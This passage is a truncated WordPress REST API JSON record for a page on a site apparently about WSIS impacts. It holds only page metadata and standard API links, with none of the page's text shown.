[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1545,"menu_order":50,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-571","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/571","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=571"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/571\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1545"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=571"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}